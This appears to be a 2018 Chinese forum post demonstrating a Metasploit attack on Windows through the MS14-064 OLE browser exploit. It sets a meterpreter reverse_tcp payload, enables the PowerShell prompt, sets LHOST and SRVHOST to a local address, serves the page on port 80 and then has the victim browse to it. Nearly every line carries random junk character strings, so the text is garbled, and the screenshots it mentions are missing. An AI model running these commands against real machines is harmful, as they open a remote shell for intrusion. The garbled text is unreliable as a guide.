! |) ?: ]6 l: Z3 r9 L5 ~9 m4 {' C E
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示! C" c# O) Q. b+ q' u5 z" e
. E+ H* D% C/ c& z% H7 N+ k
$ [9 f# n4 j V* e
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
( H/ E$ a8 B9 b) H' h- `" ^! ^
+ }& ?& w& L9 \
4 V8 M4 G# L" u7 B
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp" \9 |: |+ R' N, C
0 c% J% p! Y6 |: v$ d: A1 G' c2 p3 l6 d7 ~
set AllowPowershellPrompt true
. F3 S9 n! @8 L U
9 [( a1 R; T1 g8 Y9 e6 ]. H9 y
6 q: T* G7 ~. j Set LHOST 192.168.0.1096 I( H {1 V- N) D" H
, ^8 S: Q4 h1 U0 C
9 i# j3 D3 X/ m, [# A
set SRVHOST 192.168.0.109
& ]! }. Q" V1 T8 T% S$ y
: S3 E B0 V' F0 {4 g. ^
^' b% Q- E+ d" A
Set uripath share: \/ I, _! A+ j# x" Z
) x8 o# W0 e' X7 v) Y5 u9 w
1 R. L3 a p' i/ i Set srvport 80
7 `. Y5 u# r$ N- o& q- X
0 q+ K. X- K8 K7 B t
# `& |% R" l# C
1 y6 ^6 e, l! B$ |$ h' D
# [' I% n1 A7 X. B9 R5 i) U+ Z, K9 e! `: V5 j0 k h
7 B) w( {3 y& r8 V6 `4 m+ E
- v; ^1 J' K0 `9 x8 e2 F: F) v# ~
8 y. J* o* g5 g. O* U& W3 x$ Y: p 9 I% o* W9 u; I
1 ~; l8 a& `* k9 z; o
$ J. T6 Z0 L4 A `
, a; Q8 s* L) w& n
! |: E4 n3 P! p2 G
% i4 }* V ~$ R/ `3 k
" ? Z- N" ]1 B+ V( z
. X( C$ E8 n* `7 p- R
6 {1 w) h$ ?2 m. X) \0 Y& Y
下面我们来访问本地地址如图:3 O! V: N( q( [" O* Y6 |2 T" Z' E4 M
+ |5 g+ {9 j9 X0 n
" a0 {6 A* B$ y
# C9 v# ~' }2 n5 i, m
! E0 ^, h+ ]1 D/ o$ i% k
1 p3 R, J A2 k1 E/ c5 e
0 P. n/ @( x ]* y8 F6 L9 U' h
& O) Q) N: u$ N D
" L% y9 T5 i+ } b+ D, [; }$ ~, G 
h/ i B& ]; ~3 C" p+ S6 y$ U1 }. Z
发表于 2018-10-20 20:20:35
收藏
支持
反对